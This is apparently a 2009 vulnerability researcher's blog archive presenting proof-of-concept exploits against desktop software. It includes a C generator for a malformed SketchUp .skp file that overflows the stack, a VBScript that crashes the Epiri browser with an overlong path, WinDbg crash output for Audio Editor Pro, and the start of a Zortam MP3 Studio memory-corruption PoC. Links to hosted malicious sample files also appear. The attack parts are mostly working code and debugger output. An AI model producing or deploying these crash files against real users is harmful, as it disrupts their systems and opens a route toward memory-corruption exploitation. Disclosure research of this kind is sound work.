31 July, 2009
Google SketchUp Pro 7.0 Model File Handling Remote Stack Overflow PoC
/*
Title:
Google SketchUp Pro 7.0 Model File Handling Remote Stack Overflow PoC
Vendor:
Google Inc. (http://www.google.com)
Product Web Page:
http://www.sketchup.com
http://sketchup.google.com
Current Version:
7.0.10247
Summary:
Google SketchUp Pro 7 is a suite of powerful features and
applications for streamlining your professional 3D workflow.
Description:
Google SketchUp Pro 7.0 suffers from a stack overflow vulnerability. It fails
to handle the .skp file format resulting in crash overflowing the memory stack,
poping out the crash reporter tool from Google.
EBX, ESI and EDI gets overwritten (depending of the offset). The issue is
triggered when double-clicking the file or thru Open menu by just selecting
the file. Same happens with the 2 other apps included in this Pro version of
Google SketchUp. LayOut 2.0 (current version: 2.0.10247) suffers from the same
issue when insering the .skp file by File -> Insert -> evil.skp file. Style
Builder 1.0 (current version: 1.0.10247) by going Preview -> Change Model ->
evil.skp file.
Another issue is the DLL files provided with the Google SketchUp Pro package.
ThumbsUp.dll and xerces-c_2_6.dll mingles with the Thumbnail view from Microsoft.
If you select the created "SketchUp_PoC.skp" file, explorer.exe instantly crashes
and restarts. Every application that uses Open Dialog Boxes will crash if you view
the folder containing the PoC file in thumbnails view. Attaching files on e-mail
thru Mozilla Firefox, viewing thumbnails of the PoC crashes Firefox with it's crash
reporter, MS Office, Skype, MSN Messenger, etc...you name it.
Vendor Notification Status:
Vendor notified, fix scheduled to be included in the next upcoming release of Google
SketchUp product.
Tested On Microsoft Windows XP Professional Service Pack 3 (English)
Vulnerability Discovered By:
Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.org/
22.07.2009
---------- Memory Snip ----------
0012b310: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b330: 41414141 41414141 41414141 41414141 00120041 78138ced 38740c4c fffffffe
0012b350: 78134c58 0012b384 7c809abc 7c809ac6 0012eee0 0012eee0 02c85744 0012b360
0012b370: 02c85744 0012eda8 7c839ac0 7c809ad0 ffffffff 7c809ac6 7c809ac6 0084bdac
0012b390: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b3b0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b3d0: 00120041 78138ced 38740c4c fffffffe 78134c58 0012b414 7c809abc 7c809ac6
0012b3f0: 0012eee0 0012eee0 02c85744 0012b3f0 02c85744 0012eda8 7c839ac0 7c809ad0
0012b410: ffffffff 7c809ac6 7c809ac6 0084bdac 41414141 41414141 41414141 41414141
0012b430: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b450: 41414141 41414141 41414141 41414141 00120041 78138ced 38740c4c fffffffe
0012b470: 78134c58 0012b4a4 7c809abc 7c809ac6 0012eee0 0012eee0 02c85744 0012b480
0012b490: 02c85744 0012eda8 7c839ac0 7c809ad0 ffffffff 7c809ac6 7c809ac6 0084bdac
0012b4b0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b4d0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b4f0: 00120041 78138ced 38740c4c fffffffe 78134c58 0012b534 7c809abc 7c809ac6
0012b510: 0012eee0 0012eee0 02c85744 0012b510 02c85744 0012eda8 7c839ac0 7c809ad0
0012b530: ffffffff 7c809ac6 7c809ac6 0084bdac 41414141 41414141 41414141 41414141
0012b550: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b570: 41414141 41414141 41414141 41414141 00120041 78138ced 38740c4c fffffffe
0012b590: 78134c58 0012b5c4 7c809abc 7c809ac6 0012eee0 0012eee0 02c85744 0012b5a0
0012b5b0: 02c85744 0012eda8 7c839ac0 7c809ad0 ffffffff 7c809ac6 7c809ac6 0084bdac
0012b5d0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b5f0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b610: 00120041 78138ced 38740c4c fffffffe 78134c58 0012b654 7c809abc 7c809ac6
--------- /Memory Snip ----------
*/
#include
#include
#include
#include
#define BUFF_S 598897
#define SIZE_S 600858
#define FILE_N "SketchUp_PoC.skp"
FILE *filetzio;
char header[1961] = {
0xFF, 0xFE, 0xFF, 0x0E, 0x53, 0x00, 0x6B, 0x00, 0x65, 0x00, 0x74, 0x00, 0x63, 0x00, 0x68, 0x00,
0x55, 0x00, 0x70, 0x00, 0x20, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x65, 0x00, 0x6C, 0x00,
0xFF, 0xFE, 0xFF, 0x0B, 0x7B, 0x00, 0x37, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x31, 0x00,
0x30, 0x00, 0x32, 0x00, 0x34, 0x00, 0x37, 0x00, 0x7D, 0x00, 0xA5, 0x64, 0x9C, 0x7A, 0x5F, 0x28,
0x37, 0x4A, 0x8F, 0xBD, 0x7E, 0x93, 0x1F, 0xBA, 0x22, 0x92, 0xFF, 0xFE, 0xFF, 0x00, 0xA5, 0xB6,
0x67, 0x4A, 0xFF, 0xFF, 0x00, 0x00, 0x0B, 0x00, 0x43, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E,
0x4D, 0x61, 0x70, 0xFF, 0xFE, 0xFF, 0x09, 0x43, 0x00, 0x41, 0x00, 0x72, 0x00, 0x63, 0x00, 0x43,
0x00, 0x75, 0x00, 0x72, 0x00, 0x76, 0x00, 0x65, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x0A, 0x43, 0x00, 0x41, 0x00, 0x74, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75,
0x00, 0x74, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x13, 0x43, 0x00, 0x41,
0x00, 0x74, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75, 0x00, 0x74, 0x00, 0x65,
0x00, 0x43, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x61, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x65,
0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0F, 0x43, 0x00, 0x41, 0x00, 0x74,
0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75, 0x00, 0x74, 0x00, 0x65, 0x00, 0x4E,
0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x64, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x10, 0x43, 0x00, 0x42, 0x00, 0x61, 0x00, 0x63, 0x00, 0x6B, 0x00, 0x67, 0x00, 0x72, 0x00, 0x6F,
0x00, 0x75, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x49, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65,
0x00, 0x09, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x07, 0x43, 0x00, 0x43, 0x00, 0x61, 0x00, 0x6D,
0x00, 0x65, 0x00, 0x72, 0x00, 0x61, 0x00, 0x05, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0A, 0x43,
0x00, 0x43, 0x00, 0x6F, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x0B, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x43, 0x00, 0x43, 0x00, 0x6F,
0x00, 0x6D, 0x00, 0x70, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x42,
0x00, 0x65, 0x00, 0x68, 0x00, 0x61, 0x00, 0x76, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x05,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x14, 0x43, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6D, 0x00, 0x70,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x44, 0x00, 0x65, 0x00, 0x66,
0x00, 0x69, 0x00, 0x6E, 0x00, 0x69, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x0A,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x43, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6D, 0x00, 0x70,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x73,
0x00, 0x74, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x63, 0x00, 0x65, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x15, 0x43, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72,
0x00, 0x75, 0x00, 0x63, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x47, 0x00, 0x65,
0x00, 0x6F, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x74, 0x00, 0x72, 0x00, 0x79, 0x00, 0x00, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x11, 0x43, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x74,
0x00, 0x72, 0x00, 0x75, 0x00, 0x63, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x4C,
0x00, 0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x43,
0x00, 0x43, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x63,
0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x50, 0x00, 0x6F, 0x00, 0x69, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x06, 0x43, 0x00, 0x43, 0x00, 0x75,
0x00, 0x72, 0x00, 0x76, 0x00, 0x65, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0F, 0x43,
0x00, 0x44, 0x00, 0x65, 0x00, 0x66, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x69, 0x00, 0x74, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x73, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x04, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x62, 0x00, 0x03, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x0A, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x73, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x10, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x61, 0x00, 0x72,
0x00, 0x06, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x10, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x6D,
0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x52, 0x00, 0x61,
0x00, 0x64, 0x00, 0x69, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x0F, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x53, 0x00, 0x74, 0x00, 0x79, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x04,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0F, 0x43, 0x00, 0x44, 0x00, 0x72, 0x00, 0x61, 0x00, 0x77,
0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x45, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x6D, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x05, 0x43, 0x00, 0x45,
0x00, 0x64, 0x00, 0x67, 0x00, 0x65, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x08, 0x43,
0x00, 0x45, 0x00, 0x64, 0x00, 0x67, 0x00, 0x65, 0x00, 0x55, 0x00, 0x73, 0x00, 0x65, 0x00, 0x01,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x07, 0x43, 0x00, 0x45, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x69,
0x00, 0x74, 0x00, 0x79, 0x00, 0x03, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x05, 0x43, 0x00, 0x46,
0x00, 0x61, 0x00, 0x63, 0x00, 0x65, 0x00, 0x03, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x43,
0x00, 0x46, 0x00, 0x61, 0x00, 0x63, 0x00, 0x65, 0x00, 0x54, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74,
0x00, 0x75, 0x00, 0x72, 0x00, 0x65, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x64,
0x00, 0x73, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0C, 0x43, 0x00, 0x46, 0x00, 0x6F,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65,
0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x06, 0x43, 0x00, 0x47, 0x00, 0x72,
0x00, 0x6F, 0x00, 0x75, 0x00, 0x70, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x06, 0x43,
0x00, 0x49, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x06, 0x43, 0x00, 0x4C, 0x00, 0x61, 0x00, 0x79, 0x00, 0x65, 0x00, 0x72, 0x00, 0x02,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0D, 0x43, 0x00, 0x4C, 0x00, 0x61, 0x00, 0x79, 0x00, 0x65,
0x00, 0x72, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x72,
0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x05, 0x43, 0x00, 0x4C, 0x00, 0x6F, 0x00, 0x6F,
0x00, 0x70, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43, 0x00, 0x4D, 0x00, 0x61,
0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x69, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x0C, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x10, 0x43, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72,
0x00, 0x69, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67,
0x00, 0x65, 0x00, 0x72, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43, 0x00, 0x50,
0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x73, 0x00, 0x74, 0x00, 0x01,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0B, 0x43, 0x00, 0x50, 0x00, 0x6F, 0x00, 0x6C, 0x00, 0x79,
0x00, 0x6C, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x33, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x0D, 0x43, 0x00, 0x52, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x74,
0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x68, 0x00, 0x69, 0x00, 0x70, 0x00, 0x00,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x10, 0x43, 0x00, 0x52, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x61,
0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x68, 0x00, 0x69, 0x00, 0x70,
0x00, 0x4D, 0x00, 0x61, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x11, 0x43,
0x00, 0x52, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x65, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E,
0x00, 0x67, 0x00, 0x4F, 0x00, 0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73,
0x00, 0x23, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0D, 0x43, 0x00, 0x53, 0x00, 0x65, 0x00, 0x63,
0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x50, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x6E,
0x00, 0x65, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0B, 0x43, 0x00, 0x53, 0x00, 0x68,
0x00, 0x61, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x66, 0x00, 0x6F,
0x00, 0x07, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x07, 0x43, 0x00, 0x53, 0x00, 0x6B, 0x00, 0x46,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43,
0x00, 0x53, 0x00, 0x6B, 0x00, 0x65, 0x00, 0x74, 0x00, 0x63, 0x00, 0x68, 0x00, 0x43, 0x00, 0x53,
0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0E, 0x43, 0x00, 0x53, 0x00, 0x6B, 0x00, 0x65,
0x00, 0x74, 0x00, 0x63, 0x00, 0x68, 0x00, 0x55, 0x00, 0x70, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64,
0x00, 0x65, 0x00, 0x6C, 0x00, 0x16, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0D, 0x43, 0x00, 0x53,
0x00, 0x6B, 0x00, 0x65, 0x00, 0x74, 0x00, 0x63, 0x00, 0x68, 0x00, 0x55, 0x00, 0x70, 0x00, 0x50,
0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43,
0x00, 0x53, 0x00, 0x6B, 0x00, 0x70, 0x00, 0x53, 0x00, 0x74, 0x00, 0x79, 0x00, 0x6C, 0x00, 0x65,
0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x10, 0x43, 0x00, 0x53, 0x00, 0x6B, 0x00, 0x70,
0x00, 0x53, 0x00, 0x74, 0x00, 0x79, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E,
0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x72, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x05, 0x43, 0x00, 0x54, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x0A, 0x43, 0x00, 0x54, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, 0x53, 0x00, 0x74,
0x00, 0x79, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x05, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x08, 0x43,
0x00, 0x54, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, 0x75, 0x00, 0x72, 0x00, 0x65, 0x00, 0x06,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0A, 0x43, 0x00, 0x54, 0x00, 0x68, 0x00, 0x75, 0x00, 0x6D,
0x00, 0x62, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x69, 0x00, 0x6C, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x07, 0x43, 0x00, 0x56, 0x00, 0x65, 0x00, 0x72, 0x00, 0x74, 0x00, 0x65, 0x00, 0x78,
0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43, 0x00, 0x56, 0x00, 0x69, 0x00, 0x65,
0x00, 0x77, 0x00, 0x50, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x0B, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x0A, 0x43, 0x00, 0x57, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6D,
0x00, 0x61, 0x00, 0x72, 0x00, 0x6B, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x11, 0x43,
0x00, 0x57, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x72,
0x00, 0x6B, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x72,
0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x45, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x2D,
0x00, 0x4F, 0x00, 0x66, 0x00, 0x2D, 0x00, 0x56, 0x00, 0x65, 0x00, 0x72, 0x00, 0x73, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x2D, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0xB0, 0x04, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x03,
0x00, 0x04, 0x00, 0x43, 0x44, 0x69, 0x62, 0x04, 0x00, 0x00, 0x00, 0xFA, 0x02, 0x00, 0x00, 0x89,
0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0x00, 0x00, 0x00, 0x0D, 0x49, 0x48, 0x44, 0x52, 0x00,
0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x44, 0x08, 0x06, 0x00, 0x00, 0x00, 0x49, 0x47, 0x3D, 0x69,
0x00, 0x00, 0x00, 0x04, 0x73, 0x42, 0x49, 0x54, 0x08, 0x08, 0x08, 0x08, 0x7C, 0x08, 0x64, 0x88,
0x00, 0x00, 0x00, 0x09, 0x70, 0x48, 0x59, 0x73, 0x00
};
int main(int argc, char *argv[])
{
printf("\n");
printf("################################################################################");
printf("\nGoogle SketchUp Pro 7.0 (.skp file) Remote Stack Overflow Proof Of Concept\n");
printf("--------------------------------------------------------------------------------");
printf("\t\tby LiquidWorm
printf("################################################################################");
char sploit[SIZE_S];
char buffer[BUFF_S];
memset(buffer,0x41,BUFF_S);
memcpy(sploit,header,strlen(header));
memcpy(sploit+strlen(header),buffer,BUFF_S);
filetzio = fopen(FILE_N,"wb");
if(filetzio==NULL)
{
perror ("Oops! Can't open file.\n");
}
fwrite(sploit,1,sizeof(sploit),filetzio);
fclose(filetzio);
sleep(2);
printf("\n----> Creating PoC SketchUp Model File...\n");
sleep(1);
printf("\n----> File: %s successfully generated!\n", FILE_N);
return 0;
}
http://zeroscience.org/codes/google1.txt (Perl)
http://zeroscience.org/codes/google2.txt (C)
t00t!
30 July, 2009
Epiri Professional Web Browser 3.0 Remote Crash Exploit
' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Notiz: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)
' Vulnerable strings:
' file://
' C::
' C:\AAAA...AAAA [257]
'
' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009
' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs
Dim crash
Set crash = CreateObject("WScript.Shell")
With crash
Do Until Success = True
Success = crash.AppActivate("Epiri Professional 3.0")
Loop
'.SendKeys "file://"
'.SendKeys "C::"
.SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
.SendKeys "~" 'Return
End With
Wscript.Quit
http://zeroscience.org/codes/epiri_crash.txt
http://zeroscience.org/codes/epiri_crash.vbs
17 July, 2009
15 July, 2009
Audio Editor Pro 2.91 Remote Memory Corruption PoC
Title: Audio Editor Pro 2.91 Remote Memory Corruption PoC
Product web page: http://www.mightsoft.com/
Summary: Audio Editor Pro is a visual multifunctional audio files editor for Microsoft Windows
Tested on: MS Windows XP Pro SP3 (EN)
--------------------------windbg--------------------------
(2bc.f5c): Unknown exception - code e0000001 (first chance)
(2bc.f5c): Unknown exception - code e0000001 (first chance)
(2bc.f5c): Unknown exception - code e0000001 (first chance)
(2bc.f5c): C++ EH exception - code e06d7363 (first chance)
(2bc.f5c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=0012ec04 ebx=80040303 ecx=00000000 edx=00000000 esi=0012ec94 edi=0012ec94
eip=7c812aeb esp=0012ec00 ebp=0012ec54 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e pop esi
0:000> g
WARNING: Continuing a non-continuable exception
(2bc.f5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=80040303 ebx=80040303 ecx=00000000 edx=00000000 esi=00000000 edi=00d2ffb0
eip=0043a0c1 esp=0012eca0 ebp=0012ecb4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
*** ERROR: Module load completed but symbols could not be loaded for [path]\areditor.exe
areditor+0x3a0c1:
0043a0c1 83660c00 and dword ptr [esi+0Ch],0 ds:0023:0000000c=????????
-------------------------/windbg--------------------------
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
http://www.zeroscience.org/
16.07.2009
PoC: 1. http://zeroscience.org/codes/aimp2_evil.mp3
2. http://milw0rm.com/sploits/2009-aimp2_evil.mp3
3. http://securityreason.com/download/11/13
http://www.zeroscience.org/codes/aeditor_mc.txt
Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities
#!/usr/bin/perl
#
#
# Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities
#
# Product web page: http://www.zortam.com
#
# Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from
# two different malicious files. The first method is thru a .mp3 file which
# has its ID3 tags filled with long strings. The second method is a .m3u list
# which is loaded in to the player resulting in memory corruption of the whole
# application including Dr.Watson crashing along with the app. For 1st method,
# you can click the Search Media for MP3's button and select the folder where
# the .mp3 file with the long ID3 tags is located..boom! The 2nd method, load
# .m3u file into the MP3 Player..boom boom!
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# WinDbg:
#
# [*] overly long id3 tags (.mp3 file):
# ---------------------------------------------------------------------------
#
# (edc.f34): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
